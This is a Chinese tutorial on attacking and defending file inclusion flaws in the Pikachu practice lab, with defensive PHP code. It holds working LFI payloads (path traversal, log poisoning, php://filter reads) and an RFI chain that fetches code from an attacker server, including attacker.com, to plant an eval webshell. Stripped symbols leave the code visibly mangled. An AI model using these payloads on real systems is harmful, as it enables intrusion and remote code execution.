当前位置：首页 > article >正文

Pikachu靶场实战：File Inclusion漏洞从入门到精通（附防御代码）

article 2026/4/2 14:03:33

Pikachu靶场实战File Inclusion漏洞攻防全解析在网络安全领域文件包含漏洞File Inclusion一直是Web应用渗透测试中的高频发现项。这种看似简单的漏洞类型却能导致服务器敏感信息泄露甚至完全沦陷。Pikachu靶场作为国内知名的Web安全学习平台其精心设计的File Inclusion漏洞场景为安全爱好者提供了绝佳的实战环境。本文将带您深入理解LFI和RFI的攻击原理通过靶场实例演示多种利用手法并分享可直接集成到项目中的防御方案。1. 文件包含漏洞核心原理剖析文件包含漏洞的本质是代码执行边界失控。当开发者使用include、require等函数时如果直接拼接用户输入作为文件路径攻击者就能突破预设的文件访问范围。在Pikachu靶场中这种漏洞被典型地分为两种攻击场景本地文件包含(LFI)攻击链用户可控输入直接传入包含函数攻击者构造特殊路径如../../etc/passwd服务器返回非预期文件内容远程文件包含(RFI)攻击条件PHP配置allow_url_includeOn包含函数未校验协议类型攻击者控制外部服务器// 典型漏洞代码示例 $file $_GET[file]; include(/pages/ . $file . .php);下表对比了两种漏洞的关键差异特征LFIRFI文件来源本地文件系统远程HTTP服务器利用复杂度较低较高主要危害信息泄露远程代码执行依赖配置无特殊要求allow_url_includeOn2. Pikachu靶场LFI实战演练进入Pikachu靶场的Local File Inclusion模块我们会看到一个简单的文件选择界面。表面功能是加载指定内容页但背后隐藏着危险的实现逻辑// 漏洞代码分析 if(isset($_GET[submit]) $_GET[filename]!null){ $filename$_GET[filename]; include include/$filename; // 致命漏洞点 }分步攻击演示基础路径遍历/vul/fileinclude/fi_local.php?filename../../../../etc/passwd通过多次../回退到根目录读取系统用户信息日志文件注入先通过User-Agent注入PHP代码再包含Apache访问日志/vul/fileinclude/fi_local.php?filename../../../../var/log/apache2/access.logPHP伪协议利用/vul/fileinclude/fi_local.php?filenamephp://filter/convert.base64-encode/resourceconfig.php使用base64编码绕过内容渲染检查关键提示实际渗透中常需尝试多种路径组合因为服务器目录结构可能存在差异3. RFI攻击与WebShell部署远程文件包含的危害等级更高Pikachu靶场为此设计了完整的攻击链演示环境。假设攻击者已控制IP为192.168.1.100的服务器攻击流程在攻击机创建恶意文件hack.txt?php file_put_contents(shell.php, ?php eval($_POST[cmd]);?);启动Python HTTP服务python3 -m http.server 8000构造RFI攻击URL/vul/fileinclude/fi_remote.php?filenamehttp://192.168.1.100:8000/hack.txt访问生成的WebShell/vul/fileinclude/shell.php?cmdwhoami防御突破技巧当allow_url_include关闭时可尝试php://inputPOST提交代码利用压缩流包装器绕过扩展名限制filenamecompress.zlib://http://attacker.com/malware4. 企业级防御方案实现真正的安全防护需要多层次解决方案。以下是经过实战检验的防御代码模板输入验证层$allowed [ home pages/home.php, about pages/about.php ]; $page $_GET[page] ?? home; if(!array_key_exists($page, $allowed)) { header(HTTP/1.1 403 Forbidden); exit; } $realPath realpath($allowed[$page]); if(strpos($realPath, __DIR__) ! 0) { header(HTTP/1.1 403 Forbidden); exit; } include $realPath;服务器加固配置; php.ini关键配置 allow_url_fopen Off allow_url_include Off open_basedir /var/www/html disable_functions exec,passthru,shell_exec,system补充防御措施定期进行代码审计检查所有文件操作函数使用文件系统监控工具检测异常访问实施最小权限原则Web用户仅可访问必要目录5. 自动化检测与进阶技巧对于大型项目建议集成自动化检测机制静态检测方案# 使用正则检测危险模式 pattern r(include|require)(_once)?\s*\(.*?\$_(GET|POST|REQUEST) def scan_file(file_path): with open(file_path) as f: if re.search(pattern, f.read()): print(f漏洞发现: {file_path})动态测试方法使用Burp Suite扫描路径遍历参数注入特殊字符测试过滤逻辑file..././..././etc/passwd%00检查服务器错误响应差异在最近的一次渗透测试中我们发现即使采用了白名单机制如果未规范化路径仍可能被绕过。例如// 不安全的实现 $page str_replace(../, , $_GET[page]); include(/templates/$page); // 可被..././..././绕过这提醒我们安全开发必须采用深度防御策略任何单一防护措施都可能存在缺陷。建议结合WAF规则与运行时监控形成完整的防御体系。

Pikachu靶场实战：File Inclusion漏洞从入门到精通（附防御代码）

相关文章：

Pikachu靶场实战：File Inclusion漏洞从入门到精通（附防御代码）

Harbor集成Trivy实现镜像安全扫描：从安装到离线环境配置全攻略

手把手教你用PassFab for Office 8.5.1找回遗忘的Word/Excel密码（保姆级图文教程）

从DCM到NII：医学影像数据处理中，为什么我劝你放弃保存回DCM格式？

实战演练企业级mysql环境搭建，快马平台生成电商项目配置全流程

ViPER4Windows终极修复指南：让Windows音效神器重获新生

别再让MATLAB并行池浪费你的内存！保姆级教程教你手动精准管理Parallel Pool

高效图像压缩：MozJPEG从入门到精通

终极指南：如何用 PHP Steam API 包轻松集成 Steam 游戏数据

AutoGPT失控事件：烧毁$1M云账单的灾难复盘

ARM开发板也能玩转电子相册？手把手教你用GEC6818和Linux驱动LCD屏

告别重复造轮子：用快马AI一键生成Unity高效开发工具与通用模块

DeepSeek R1的蒸馏为啥只做SFT不加RL？聊聊论文里没明说的权衡与社区机会

斯坦福+哈佛医学院：虚拟细胞图像生成基础模型

Windows DLL注入工具Xenos实战指南：问题解决与效能优化

Ubuntu 24.04 Noble Numbat 尝鲜记：用Docker搞定ROS 2 Humble开发环境（附镜像拉取与容器运行全流程）

从零到一：基于SkyWalking构建微服务可观测性实践

别再搞混了！Docker部署Redis Stack时，选redis/redis-stack还是redis/redis-stack-server？

MPU9250 I²C驱动库深度解析与嵌入式工程实践

别再死记硬背了！用‘借位法’5分钟搞定子网划分，网工面试必看

树莓派4B部署YOLOv5-Lite实战：从ONNX模型优化到实时检测性能调优

为什么你的Ubuntu实时内核编译失败了？PREEMPT_RT补丁的5个关键配置解析

Java实战：阿里云OSS文件操作工具类封装与优化

保姆级教程：PX4 EKF调参实战，手把手教你搞定Q、R矩阵（附避坑指南）

EPSON机器人通信避坑指南：TCP/IP协议在LS3-401S上的常见问题与解决方案

保姆级教程：用sw_urdf_exporter插件将Solidworks机械臂模型转为ROS可用的URDF

用STM32F103C8T6和NRF24L01自制遥控器，从硬件选型到代码调试的完整避坑指南

万象视界灵坛部署教程：阿里云ECS+Docker一键部署开源多模态感知平台

通过WireShark与WinHex从pcap数据流中提取并修复损坏的JPG图片

IDM试用期突破技术深度解析：从原理到实战的全方位解决方案